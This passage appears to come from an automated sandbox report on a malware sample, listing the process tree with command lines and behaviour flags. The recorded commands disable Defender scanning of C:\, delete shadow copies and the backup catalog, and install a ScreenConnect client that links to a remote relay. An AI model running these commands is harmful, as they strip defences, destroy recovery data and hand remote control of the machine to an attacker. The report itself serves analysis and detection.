    - \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe (PID 1136)
      Command line: c:\windows\system32\windowspowershell\v1.0\powershell.exe "Add-MpPreference -ExclusionPath C:\ -ErrorAction SilentlyContinue"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 804)
    Command line: "cmd" /C timeout 10
    - C:\Windows\SysWOW64\timeout.exe (PID 1076)
      Command line: timeout 10
      Signatures: Delays execution with timeout.exe
  - C:\Windows\tasks\MpResult.exe (PID 2004)
    Command line: "C:\Windows\tasks\MpResult.exe"
    Signatures: Executes dropped EXE
    - C:\Windows\system32\WerFault.exe (PID 1476)
      Command line: C:\Windows\system32\WerFault.exe -u -p 2004 -s 524
      Signatures: Program crash; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 2008)
    Command line: "cmd" /C timeout 30
    - C:\Windows\SysWOW64\timeout.exe (PID 1284)
      Command line: timeout 30
      Signatures: Delays execution with timeout.exe
  - C:\Windows\tasks\SA.exe (PID 1080)
    Command line: "C:\Windows\tasks\SA.exe"
    Signatures: Executes dropped EXE; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses
    - C:\Windows\tasks\SA.exe (PID 1536)
      Command line: "C:\Windows\tasks\SA.exe" n1080
      Signatures: Executes dropped EXE
    - C:\Windows\system32\cmd.exe (PID 1720)
      Command line: "C:\Windows\system32\cmd.exe"
      - C:\Windows\system32\vssadmin.exe (PID 1616)
        Command line: vssadmin delete shadows /all /quiet
        Signatures: Interacts with shadow copies
      - C:\Windows\system32\wbadmin.exe (PID 924)
        Command line: wbadmin delete catalog -quiet
        Signatures: Deletes backup catalog
      - C:\Windows\System32\Wbem\WMIC.exe (PID 1092)
        Command line: wmic shadowcopy delete
  - C:\Windows\SysWOW64\msiexec.exe (PID 1412)
    Command line: "C:\Windows\System32\msiexec.exe" /i "C:\Windows\tasks\0.msi"
    Signatures: Enumerates connected drives; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow
- C:\Windows\system32\vssvc.exe (PID 840)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\msiexec.exe (PID 692)
  Command line: C:\Windows\system32\msiexec.exe /V
  Signatures: Enumerates connected drives; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\syswow64\MsiExec.exe (PID 1900)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding C785D976AD9FA515F342E1F1D071DC67 C
    Signatures: Loads dropped DLL
    - C:\Windows\SysWOW64\rundll32.exe (PID 1972)
      Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI1352.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259462266 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
      Signatures: Loads dropped DLL
  - C:\Windows\syswow64\MsiExec.exe (PID 588)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding B6D68DC15C0E38A49FDFDBADE9C9DDA8
    Signatures: Loads dropped DLL
  - C:\Windows\syswow64\MsiExec.exe (PID 1184)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 7F8112C2C14327E4C85E3D81CDAEDEFC M Global\MSI0000
    Signatures: Loads dropped DLL; Drops file in Windows directory
- C:\Windows\system32\wbengine.exe (PID 1380)
  Command line: "C:\Windows\system32\wbengine.exe"
- C:\Windows\System32\vdsldr.exe (PID 1656)
  Command line: C:\Windows\System32\vdsldr.exe -Embedding
- C:\Windows\System32\vds.exe (PID 2016)
  Command line: C:\Windows\System32\vds.exe
- C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.ClientService.exe (PID 2072)
  Command line: "C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-ik5pej-relay.screenconnect.com&p=443&s=a60c552f-9f0b-4dd5-904c-0ccd9212fff8&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zVeSGMrM9tjSmcGjFMIuyURXojoZNENzG7UM5aZF%2bqcw53mTJ4uRjJ7my742YfqvdqEv0F%2bvBqtPkyvQZQX7VKjWOs6KX89pV65ae014dBdhqIRQ%2feUjAx2MFIBKuSBNdhWUbkELS0qKb1oPsVIzst%2bHhgTLE3nWh5ag8s1Lvgy02hG5HM0ay%2bi1TowXRq9%2faSRe1qoK9SYcwuxU0zXzPl7tkshPvA7Z8jpsvcOBRNMz3fhBgbq7kDY%2bt4RbC50OHi%2fvku3xupvBXBKD0JnIaElhg2ICDmR3qr2TmKEwXQMIurOfpE9dng26klJNU8JNeytupnkksxce%2fyzzvPeo&t=&c=&c=&c=&c=&c=&c=&c=&c="
  Signatures: Executes dropped EXE; Loads dropped DLL; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
  - C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe (PID 2260)
    Command line: "C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe" "RunRole" "7358460f-4c3a-441d-96b2-94870076e8e9" "User"
    Signatures: Executes dropped EXE; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
  - C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe (PID 2336)
    Command line: "C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe" "RunRole" "903263a8-03af-48f0-a774-9d77c6079200" "System"
    Signatures: Executes dropped EXE; Checks processor information in registry; Enumerates system info in registry; Modifies data under HKEY_USERS